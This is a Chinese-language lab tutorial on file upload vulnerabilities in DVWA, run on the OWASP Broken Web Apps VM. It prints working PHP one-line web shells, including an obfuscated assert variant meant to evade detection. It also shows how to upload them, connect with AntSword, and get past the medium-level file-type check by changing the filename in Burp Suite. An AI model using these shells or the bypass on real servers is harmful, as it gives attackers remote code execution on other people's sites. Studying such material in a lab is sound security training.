owasp上传漏洞
owasp下载地址:
https://sourceforge.net/projects/owaspbwa/files/
注:如遇dvwa无法更改难度 多半为cookie所致 请随以下教程删除网站的缓存:请点这里
文件上传是 Web 应用的必备功能之一,比如上传头像显示个性化、上传附件共享文件、上传脚本更新网站。如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件、exe 程序等,这就造成了文件上传漏洞。
我们先从一句话木马说起
1.一句话木马
<?php @eval($_POST['123']);?>
这便是最简单的一句话木马。
这段php代码被分为以下几个部分:
**@**表示后面即使执行错了,也不会报错。
**eval()**函数表示将括号里的内容当作代码执行。
$_POST[‘123’]表示从页面中获得123这个参数值。
也就是说,该页面只要收到了123这个密码,就会按照eval()的逻辑去运行。
只要了解了该文件的路径,便可以对该机器(利用菜刀或蚁剑)为所欲为了。
一句话木马还有很多变种:
<?php @assert($_REQUEST[123]); ?> // GET 数据从url提交
POST 数据采用隐蔽方式提交
REQUEST即支持GET方式、又支持POST方式
<?php $k="ass"."ert"; $k($_REQUSET['123']);?>
//利用字符串绕过检测的一句话木马
....以下略
2.渗透过程
owasp下载地址:
https://sourceforge.net/projects/owaspbwa/files/
低等级(Security=low)
我们先通过右下角的view source按钮来观察网页代码 寻找规律
可以看到该网站并没有对上传的文件类型与大小做较为明显的防备
漏洞很大
那么我们创建一个1.php 在其中加上代码<?php @eval($_POST['123']);?>
随后登陆网站 上传 完事
至于kali下载蚁剑的方式:参考资料
我们打开蚁剑 按照网页所给提示 文件被上传在了
http://192.168.246.132/dvwa/hackable/uploads/1.php 处
在url地址中填入前者 在连接密码中填入123
先测试链接 然后按保存
测试链接显示成功其实就已经完事了
随后研究蚁剑 你便会发现它的功能全备 非常厉害
中等级 (Security=medium)
我们先通过DVWA Security将安全度调整至medium
然后继续进入上传漏洞网页 view source
可以看到这次的上传对上传的文件类型与上传的文件大小做了限制
文件类型限制为jpeg文件 大小限制在了100000byte以内(1KB=1024B byte=B=字节)
文件大小由于使用一句话木马 因此可以轻松解决
文件类型的问题则可以使用多种方法来解析
1)利用burpsuite
关于burpsuite的配置
↑proxy-proxy setting中设置本地地址与端口
配置firefox中的设置-proxy settings 注意ip与端口要与前者保持一致
进入上传漏洞的网页 按这个按钮就能开始监听
先分析一下刚才得到的条件:
文件类型仅限jpeg
那我们便将一句话木马.php文件的后缀更改为jpeg交给前端 通过burpsuite更改后缀来修改成php文件类型
那么开始实践
将1.php复制一份备份 其中一份更名为1.jpeg
开启burpsuite的监听 将1.jpeg上传至网站 等待拦截结果
网站一直处于加载中 且burpsuite显示拦截结果 说明成功拦截
我们将filename=“1.jpeg”
更改为filename=“1.php”
随后点击forward
放行
可以看到上传成功 我们继续在蚁剑里测试
好的 链接也成功了 这说明目标已完成